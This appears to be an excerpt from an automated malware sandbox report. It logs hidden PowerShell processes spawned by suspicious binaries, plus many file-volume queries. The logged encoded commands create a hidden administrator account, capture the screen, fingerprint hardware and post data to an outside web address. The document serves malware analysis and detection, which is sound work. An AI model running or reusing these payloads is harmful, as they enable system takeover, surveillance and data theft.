Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -encodedcommand "uwb0ageacgb0ac0auabyag8aywblahmacwagahaabwb3aguacgbzaggazqbsagwaiaatafcaaqbuagqabwb3afmadab5agwazqagaggaaqbkagqazqbuacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacialqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabgaiacwaiaaiac0atgbvaewabwbnag8aigasacaaigatae4abwbqahiabwbmagkabablacialaagacialqbfahgazqbjahuadabpag8abgbqag8ababpagmaeqagaeiaeqbwageacwbzacialaagacialqbfag4aywbvagqazqbkaemabwbtag0ayqbuagqaiabtafeaqgbgaeeargbnaeeasqbbaeeabwbbaeyacwbbafyaqqbcaeyaqqbgagcaqqbwaeeaqqb1aeearqbvaeeavabnaeiarabbaeuaoabbafoaqqbcahaaqqbhadqaqqbsahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbgaeeasabraeeavqb3aeiavqbbaegasqbbafmauqbcae8aqqbfagmaqqblaeeaqqbvaeearqbraeeavgb3aeiaeqbbaemaqqbbaesaqqbcagiaqqbgae0aqqblafeaqgb6aeeasabraeeawgbraeiadabbaemanabbafyaqqbcagwaqqbiagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaecaoabbafoaqqbcahaaqqbhadqaqqbaahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeasabraeeavqb3aeiamabbaegasqbbageauqbcahuaqqbhagmaqqblaeeaqgbiaeearqbnaeeaygb3aeiadqbbaegawqbbafoauqbcahkaqqbiafeaqqbyafeaqqa2aeearabvaeeaugbnaeiaeqbbaecaoabbagiauqbcaemaqqbhaeuaqqbjahcaqgbsaeearabzaeeatgbbaeiavabbaegauqbbagmazwbcahaaqqbhadqaqqbaahcaqqbvaeeaqwbjaeeawqbraeiasqbbaeyasqbbae0aqqbcagoaqqbfagcaqqbuafeaqqayaeearqb3aeeazqbraeeanqbbaecabwbbafkazwbbahkaqqbfadqaqqbkagcaqgbpaeeargbjaeeavgbnaeeadwbbaecarqbbafiadwbbaduaqqbhahmaqqbxagcaqgbuaeearabvaeeayqb3aeiayqbbaeyatqbbae8auqbcaggaqqbgag8aqqbrafeaqqa5aeearaawaeeasqbnaeeacabbaemaawbbaesauqbbahaaqqbdadqaqqbrahcaqgbqaeearqa0aeeazabbaeiargbbaeuanabbagqaqqbbahaaqqbdagsaqqaiaa=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavabfafgavaauaeuatgbdae8azabpag4arwbdadoaogbvafqarga4ac4arwbfahqauwbuahiasqboaecakaaoaekavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5agoaygayae4adgbiafcavgawagearwa5agsawgbtaduaawbaafmaoqbhafoaqqa9ad0aigapackakqapac4aqwbpae4adabfae4adaapacka	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa4ageaoaa0agmamwa2adaaoqazadiamwbkaguangbjagqaoqbjadianqbhadeaoaa1adeazaawagqaywbkadgayqayagyamwbiadaaoqa3adcangbiagyaoabladcazaa0agqanga0adaamgbhadyanwayadaaywaxageazabkadgaoqbhadiamwbkaduazqbkadeamgbladaanqbjagyamgbmaduamwbkadcaygawadeanqbladcangbiagqanqbiadgamgayadmaoqa5adganwbjadaanaa5agqazqbmagiaoqbiaguanwa3adcanqbmadaayga1adaazqaxadmamabkadgazabiaguazabladqanqa4adgayqawadyazqawagiaygawaduanga4agiaywa5agqaywa1ageaoqa1adkamaa1adgazaaxagiaoqa4adcamwayagiayga4agqayqa0agmamaa3agqaygbiaduanga3agyaoqazagyamwa3adaangbkagqangayagyazaayadeazga1aguayqbladeanwayagqanqawadiangbjagqazaa1adianwa5agyaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpac	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa4ageaoaa0agmamwa2adaaoqazadiamwbkaguangbjagqaoqbjadianqbhadeaoaa1adeazaawagqaywbkadgayqayagyamwbiadaaoqa3adcangbiagyaoabladcazaa0agqanga0adaamgbhadyanwayadaaywaxageazabkadgaoqbhadiamwbkaduazqbkadeamgbladaanqbjagyamgbmaduamwbkadcaygawadeanqbladcangbiagqanqbiadgamgayadmaoqa5adganwbjadaanaa5agqazqbmagiaoqbiaguanwa3adcanqbmadaayga1adaazqaxadmamabkadgazabiaguazabladqanqa4adgayqawadyazqawagiaygawaduanga4agiaywa5agqaywa1ageaoqa1adkamaa1adgazaaxagiaoqa4adcamwayagiayga4agqayqa0agmamaa3agqaygbiaduanga3agyaoqazagyamwa3adaangbkagqangayagyazaayadeazga1aguayqbladeanwayagqanqawadiangbjagqazaa1adianwa5agyaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpacaapqagadaaowagac
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
